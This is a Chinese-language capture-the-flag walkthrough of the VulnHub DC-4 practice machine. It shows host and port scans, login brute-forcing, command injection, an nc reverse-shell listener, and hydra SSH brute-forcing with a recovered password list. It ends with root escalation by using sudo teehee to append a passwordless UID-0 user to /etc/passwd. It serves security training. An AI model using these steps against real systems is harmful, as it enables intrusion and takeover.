渗透测试靶机vulnhub——DC4实战笔记
创始人
2025-05-31 10:56:07
0

信息收集

fscan扫描存活主机

PS C:\Users\lenovo\Desktop\HackTool> .\fscan64.exe -h 192.168.1.0/24___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.1.53    is alive
(icmp) Target 192.168.1.108   is alive
(icmp) Target 192.168.1.1     is alive
(icmp) Target 192.168.1.104   is alive
(icmp) Target 192.168.1.105   is alive
(icmp) Target 192.168.1.109   is alive
[*] Icmp alive hosts len is: 6

确定目标主机是192.168.1.105

namp扫描端口

 nmap -A 192.168.1.105 -p-                                                     
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-20 10:11 CST
Nmap scan report for 192.168.1.105
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds
zsh: segmentation fault  nmap -A 192.168.1.105 -p-

开放了22和80端口,直接访问web服务

就一个登录框

暴力破解

直接爆破密码

爆出密码是happy

命令执行

登进去一看是命令执行漏洞

抓包修改参数,查看用户

查看到有三个用户,charles、jim、sam

nc反弹shell

nc -lvp 9999

python切换shell

python3 -c "import pty;pty.spawn('/bin/bash')"

在/home/jim目录下发现文件old-passwords.bak文件,查看,可以作为爆破ssh的密码字典

复制保存到kali

爆破ssh

└─$ sudo hydra -l jim -P pass.txt ssh://192.168.1.105                                    

最后密码是jibril04

登录提示you have mail

存在Charles的密码Password is: ^xHhA&hvim0y

切换用户

su charles

sudo提权

sudo -l

有最追加写入文件功能的时候,直接往 /etc/passwd 里加个root用户

teehee提权

passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]
echo "yesir::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

flag

他帮你驱散黑暗,我却带给你光明。可,你心里没有我

相关内容

热门资讯

C++基础学习笔记(四)——核... 参考链接:https://www.bilibili.com/video/BV1et41...
超详细-安装vCenterv ... 目录 介绍: 第一阶段安装: 第二阶段安装: 最近在玩虚拟...
第14届蓝桥杯STEMA测评真... [导读]:超平老师的《Scratch蓝桥杯真题解析100讲》已经全部完成,...
ChatGPT助力校招----... 1 ChatGPT每日一题:简述SPI通信协议 问题:简述SPI通信协议...
新版PMP考试难不难? 1.新版考试题量和答题时间的变化? 总题量从200道减少到180道,所以...
HBase客户端、服务器端、列... HBase客户端、服务器端、列簇设计、HDFS相关优化,HBase写性能优化切入点&#...
linux 全局环境变量删除后... linux 全局环境变量删除后 还有 仍然存在1、编辑 /etc/profile2、设置REDISC...
网站流量飙升背后:外贸企业谷歌... 自从我涉足外贸行业,我逐渐认识到谷歌SEO优化在提升网站流量和吸引潜在客户方面的重要性...
一、trino406系列 之 ... 文章目录前言Trino不是什么?Trino是什么?概览服务类型Coord...
基于Java+SpringBo...  博主介绍:专注于Java技术领域和毕业项目实战 🍅文末获取源码联系&...
财经时评|破除“内卷式”竞争 ... 作者 中国汽车工程学会理事长张进华“十四五”以来,我国智能网联新能源汽车产业坚持以科技创新引领和推动...
二十六、对象的实例化内存布局与... 一、对象的实例化 1.判断对象对用的类是否加载、链接、初始化。 2.为对象分配内存。 3.处理并发...
C语言简单工厂模式和工程创建 一,设计模式概念引入① 什么是设计模式设计模式通常被面向对象的软件开发人员所采用&#x...
新势力车企5月销量:零跑汽车再... 红星资本局6月1日消息,今日,新势力车企陆续公布5月销量数据。零跑汽车(09863.HK)再创历史新...
150.网络安全渗透测试—[C... 我认为,无论是学习安全还是从事安全的人多多少少都会有些许的情怀和使命感!...
微服务注册中心做了什么事——服... 是否被一大堆的注册中心八股文淹没,不知道哪个是哪个,有啥区别甚至于不知道...
财经时评|反内卷不能只靠自觉 ... 作者 汽车工业协会原常务副会长兼秘书长、中国动力电池产业联盟理事长董扬去年四季度以来,政府工作报告及...
Lua打表 参考:https://www.likecs.com/show-308547984.ht...
Python-伪数据构造库fa... 目录 radar lipsum fake2db radar 可用来生成随机时间 import r...
LabVIEW调用Matlab... 文章目录方法分类Coder+VS故障问题解决 在LabVIEW与Matlab混合编程进行图像...